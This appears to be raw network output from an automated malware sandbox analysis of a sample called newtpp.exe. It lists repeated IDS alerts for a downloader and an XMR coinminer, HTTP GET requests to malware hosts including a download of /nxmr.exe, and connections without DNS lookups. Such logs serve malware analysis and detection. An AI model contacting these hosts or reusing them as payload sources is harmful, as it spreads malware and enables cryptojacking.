                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49982 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49988 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50000 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49961 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49970 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50011 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50017 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50024 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50047 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50036 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50055 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50066 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50075 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50086 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50077 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50082 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50084 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50093 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50080 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50087 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50096 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50091 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50100 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50098 -> 91.202.233.141:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50078 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50089 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50094 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49838 -> 185.215.113.66:5152
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.249.62.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.249.62.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.249.62.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.249.62.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.249.62.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 90.156.163.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 90.156.163.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 90.156.163.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 90.156.163.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00401C50 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv,0_2_00401C50
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
